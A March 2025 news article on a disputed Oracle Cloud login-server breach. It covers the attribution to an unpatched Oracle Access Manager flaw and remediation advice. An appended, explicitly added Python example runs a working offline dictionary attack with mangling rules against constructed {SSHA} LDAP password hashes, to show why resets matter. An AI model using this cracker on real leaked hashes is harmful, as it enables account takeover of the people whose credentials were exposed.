Oracle says no breach, but hacker flaunts stolen cloud login data

Published 25 Mar 2025

Oracle has firmly denied claims of a data breach after a hacker allegedly stole 6 million records from its cloud servers. Cybersecurity researchers, however, have presented evidence suggesting the tech giant’s systems were compromised.

On March 20, a hacker using the name “rose87168” posted data for sale on the dark web forum BreachForums. The stolen information reportedly includes encrypted SSO passwords, Java KeyStore files, and LDAP credentials from Oracle Cloud federated login servers.

“There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data,” an Oracle spokesperson told The Register.

Security firm CloudSEK contradicted Oracle’s statement in an analysis published on March 24. The researchers assessed that the hacker most likely exploited CVE-2021-35587, a critical (CVSS 9.8) pre-authentication remote code execution flaw in Oracle Access Manager, the single sign-on component of Oracle Fusion Middleware. The bug is reachable over plain HTTP without any credentials, and CloudSEK found the affected login server was still running an outdated Fusion Middleware 11g build that had never received the fix.

“This follow-up report equips the community and Oracle with facts to investigate and mitigate this threat responsibly,” said Rahul Sasi, CloudSEK’s CEO.

As proof of their access, the hacker uploaded a text file to login.us2.oraclecloud.com, which was captured by the Internet Archive's Wayback Machine in early March. CloudSEK verified that the host was a live Oracle server through both the Wayback Machine snapshots and scripts in GitHub repositories under Oracle’s official account that referenced it.

The breach reportedly affects over 140,000 companies, with more than 1,600 Australian domains on the list. Companies including Telstra, Optus, NBN Co, and Deloitte appear among potential victims.

Two companies have reportedly already paid the hacker to remove their data. Meanwhile, major service providers like Optus and NBN Co have taken safety measures.

“In an abundance of caution, Optus has taken additional steps to ensure our systems are and remain secure,” an Optus spokesperson said.

The hacker first demanded 200 million XMR (Monero cryptocurrency) from Oracle but later offered to sell the data for undisclosed amounts or trade it for zero-day exploits.

“The SSO passwords are encrypted; they can be decrypted with the available files. LDAP hashed passwords can be cracked,” the hacker claimed in their BreachForums post.

As this dispute continues, security practitioners recommend that organizations whose domains appear on the list treat the data as compromised regardless of Oracle’s position: reset SSO and LDAP passwords, regenerate the keys and certificates held in any Java KeyStore that passed through the affected servers (a stolen keystore is exactly what would let the “encrypted” SSO passwords be decrypted, so rotating passwords alone is not enough), enforce multi-factor authentication on cloud-facing identity providers, and review authentication logs for sign-ins by the exposed accounts.
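The hacker’s claim that the stolen LDAP password hashes “can be cracked” is worth seeing concretely, because it is why the advice above is to reset credentials rather than wait and see. The example below is added here and is not code from the article, from CloudSEK or from Oracle. It assumes the directory stored passwords in the common RFC 2307 {SSHA} (salted SHA-1) scheme; the article does not say which scheme Oracle’s servers used, so that is an assumption, and every hash, user name and wordlist entry is constructed for the example.

```python
"""Added example: offline dictionary attack on {SSHA} LDAP password hashes.

Not from the original article. Assumes the RFC 2307 {SSHA} scheme
(base64(sha1(password || salt) || salt)); all data below is constructed.
"""
import base64
import hashlib
import os
from typing import Dict, Iterable, Iterator, List, Optional

SCHEME = "{SSHA}"


def make_ssha(password: str, salt: Optional[bytes] = None) -> str:
    """Produce a {SSHA} userPassword value the way a directory server would."""
    if salt is None:
        salt = os.urandom(8)
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return SCHEME + base64.b64encode(digest + salt).decode("ascii")


def check_ssha(stored: str, candidate: str) -> bool:
    """Verify one candidate against a stored {SSHA} value.

    The salt is carried inside the value, so anyone holding a dump of the
    directory has everything needed to test guesses at full speed: the salt
    only defeats precomputed tables, not per-hash guessing, and SHA-1 has no
    work factor to slow the attacker down.
    """
    if not stored.startswith(SCHEME):
        raise ValueError(f"unsupported password scheme in {stored[:12]!r}")
    raw = base64.b64decode(stored[len(SCHEME):])
    digest, salt = raw[:20], raw[20:]  # SHA-1 digests are 20 bytes; rest is salt
    return hashlib.sha1(candidate.encode("utf-8") + salt).digest() == digest


def candidates(base_words: Iterable[str]) -> Iterator[str]:
    """Tiny rule-based mangler of the kind real cracking tools apply:
    capitalisation, appended years, trailing punctuation."""
    for word in base_words:
        cap = word.capitalize()
        yield word
        yield cap
        for year in ("2023", "2024", "2025"):
            yield word + year
            yield cap + year
            yield cap + year + "!"


def crack(stored: str, base_words: List[str]) -> Optional[str]:
    """Return the first candidate that matches the stored hash, else None."""
    for guess in candidates(base_words):
        if check_ssha(stored, guess):
            return guess
    return None


def crack_dump(dump: Dict[str, str], base_words: List[str]) -> Dict[str, Optional[str]]:
    """Run the attack over a {user: userPassword} dump."""
    return {user: crack(stored, base_words) for user, stored in dump.items()}


# Constructed stand-in for a leaked directory dump (fixed salts for determinism).
STOLEN_DUMP = {
    "alice": make_ssha("Summer2024!", salt=b"\x9a\x2f\x11\x40"),
    "bob": make_ssha("correct horse battery staple", salt=b"\x07\xc3\x55\xee"),
}

# Constructed base wordlist; a real attack would use millions of entries.
BASE_WORDS = ["summer", "password", "oracle", "welcome"]


if __name__ == "__main__":
    for user, result in crack_dump(STOLEN_DUMP, BASE_WORDS).items():
        print(f"{user}: {'cracked -> ' + result if result else 'not found'}")
```

The weak, pattern-shaped password falls to a four-word list with a handful of mangling rules; the long passphrase does not, but an attacker with the dump can keep guessing indefinitely, which is why a suspected leak of directory hashes is handled by forcing resets and requiring MFA rather than by hoping the hashes hold.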